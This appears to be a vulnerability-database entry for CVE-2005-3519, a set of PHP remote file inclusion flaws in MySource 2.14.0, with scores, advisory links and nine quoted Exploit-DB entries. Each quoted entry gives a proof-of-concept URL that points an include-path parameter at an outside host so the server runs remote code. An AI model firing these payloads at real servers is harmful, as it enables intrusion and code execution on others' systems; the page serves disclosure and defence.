CVE-2005-3519
Published 2005-11-06
Priority: P347 · Severity: high · CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 8.01% (94.0th percentile)
Multiple PHP file inclusion vulnerabilities in MySource 2.14.0 allow remote attackers to execute arbitrary PHP code and include arbitrary local files via the (1) INCLUDE_PATH and (2) SQUIZLIB_PATH parameters in new_upgrade_functions.php, (3) the INCLUDE_PATH parameter in init_mysource.php, and the PEAR_PATH parameter in (4) Socket.php, (5) Request.php, (6) Mail.php, (7) Date.php, (8) Span.php, (9) mimeDecode.php, and (10) mime.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mysource | mysource | — | — |
| mysource | mysource | — | — |
No detection rules found.
Exploit-DB
MySource 2.14 - 'init_mysource.php?INCLUDE_PATH' Remote File Inclusion
exploitdb·2005-10-18
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/web/init_mysource.php?INCLUDE_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'Date.php?PEAR_PATH' Remote File Inclusion
exploitdb·2005-10-18
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/pear/Date/Date.php?PEAR_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'mimeDecode.php?PEAR_PATH' Remote File Inclusion
exploitdb·2005-10-18
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/pear/Mail_Mime/mimeDecode.php?PEAR_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'new_upgrade_functions.php' Multiple Remote File Inclusions
exploitdb·2005-10-18
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://www.example.com/[file]?
http://www.example.com/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'mail.php?PEAR_PATH' Remote File Inclusion
exploitdb·2005-10-18
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/pear/Mail/Mail.php?PEAR_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'Request.php?PEAR_PATH' Remote File Inclusion
exploitdb·2005-10-18
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/pear/HTTP_Request/Request.php?PEAR_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'Span.php?PEAR_PATH' Remote File Inclusion
exploitdb·2005-10-18
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/pear/Date/Date/Span.php?PEAR_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'Socket.php?PEAR_PATH' Remote File Inclusion
exploitdb·2005-10-18
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/pear/Net_Socket/Socket.php?PEAR_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'mime.php?PEAR_PATH' Remote File Inclusion
exploitdb·2005-10-18
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/pear/Mail_Mime/mime.php?PEAR_PATH=http://www.example.com/[file]?
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=112966933202769&w=2
http://secunia.com/advisories/16946/
http://securityreason.com/securityalert/92
http://securitytracker.com/id?1015075
http://www.osvdb.org/20035
http://www.osvdb.org/20036
http://www.osvdb.org/20037
http://www.osvdb.org/20038
http://www.osvdb.org/20039
http://www.osvdb.org/20040
http://www.osvdb.org/20041
http://www.osvdb.org/20042
http://www.osvdb.org/20043
http://www.securityfocus.com/bid/15133/discuss
http://www.vupen.com/english/advisories/2005/2132
https://exchange.xforce.ibmcloud.com/vulnerabilities/22772
2005-11-06
Published